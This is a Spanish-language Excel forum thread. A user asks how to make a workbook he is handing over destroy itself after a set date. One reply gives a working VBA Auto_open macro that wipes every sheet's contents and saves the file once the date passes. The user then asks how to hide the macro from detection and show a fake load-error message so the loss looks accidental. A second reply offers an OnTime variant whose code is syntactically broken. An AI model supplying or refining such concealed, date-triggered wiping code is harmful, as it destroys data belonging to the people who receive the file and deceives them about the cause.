Excel - EXCEL CON CADUCIDAD

 
Vista:
sin imagen de perfil

EXCEL CON CADUCIDAD

Publicado por MIGUEL (53 intervenciones) el 28/12/2016 22:31:45
Buenas tardes

Necesito poner caducidad y que se autodestruya un archivo Excel. En las próximas fechas tendré que dejar un Excel y quiero que no se aprovechen de mi trabajo de muchas horas. He leído otros comentarios pero no se hacerlo. Podíais hacerlo por pasos o dejarme un Excel con el ejemplo? Sería de gran ayuda

Muchas gracias
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder
Imágen de perfil de wordexperto.com
Val: 6.373
Oro
Ha mantenido su posición en Excel (en relación al último mes)
Gráfica de Excel

EXCEL CON CADUCIDAD

Publicado por wordexperto.com (2803 intervenciones) el 29/12/2016 10:51:52
Hola Miguel:
Esta macro elimina el libro si se abre después de la fecha que le indiques:
1
2
3
4
5
6
7
8
9
10
Sub Auto_open()
If Date >= CDate("06-06-2066") Then
    For i = 1 To Sheets.Count
        Sheets(i).Select
        ActiveSheet.Cells.Delete
    Next
    ActiveWorkbook.Save
    ActiveWorkbook.Close
End If
End Sub

https://wordexperto.com/blog/
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
2
Comentar
sin imagen de perfil

EXCEL CON CADUCIDAD

Publicado por MIGUEL (53 intervenciones) el 30/12/2016 11:30:59
Muchas gracias por tu ayuda de verdad. Voy a probarlo y te digo. Muchas gracias.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar
sin imagen de perfil

EXCEL CON CADUCIDAD

Publicado por MIGUEL (53 intervenciones) el 30/12/2016 12:45:22
Buenos días
Acabo de probarlo y va perfecto. muchísimas gracias

por ultimo para que dicha macro no se vea o este oculta para que no la detecten y la inhabiliten?

Muchas gracias por tu ayuda.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar
sin imagen de perfil

EXCEL CON CADUCIDAD

Publicado por MIGUEL (53 intervenciones) el 30/12/2016 13:06:58
y ya para terminar

Se podría hacer que saliera un texto como "Problemas al cargar el excell. pulse aceptar y ábralo de nuevo"

Es mas que nada para evitar sospechas y que parezca que se ha estropeado solo.

Muchísimas gracias de verdad.

Es muy importante para mi.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

EXCEL CON CADUCIDAD

Publicado por Jme (1 intervención) el 30/03/2019 21:05:57
Tarde vi esto, hoy ya toda una compañía usa mi trabajo y yo cesante
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

EXCEL CON CADUCIDAD

Publicado por GUILLERMO (1 intervención) el 31/07/2021 15:38:06
excelente desarrollo... gracias
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar
Imágen de perfil de Manuel
Val: 108
Ha mantenido su posición en Excel (en relación al último mes)
Gráfica de Excel

EXCEL CON CADUCIDAD

Publicado por Manuel (32 intervenciones) el 29/12/2016 10:54:50
Otra opción de como hacerlo, pues con Application.OnTime para ejecutar una macro que tu definas:

1
2
3
Sub Auto_Open()
Application.OnTime Time TimeValue("12:00"),"LaMacroquehagaeltrabajo"
End Sub

En este caso, a esa hora se ejecuta la macro que has definido y en ella deberías comprobar si se ha sobrepasado la fecha límite y si es así, pues actuar en consecuencia: borrar el archivo (se puede hacer vía código), cambiar los datos, simplemente que cierre automáticamente, etc...

hasta luego
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar
sin imagen de perfil

EXCEL CON CADUCIDAD

Publicado por MIGUEL (53 intervenciones) el 30/12/2016 11:36:35
Buenos días
Perdona mi ignorancia pero entiendo que se ejecuta en una hora no?
Lo que necesito es que no se pueda utilizar a partir de una fecha...
Que opciones hay? Que se autodestruya, que se borre, etc...
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar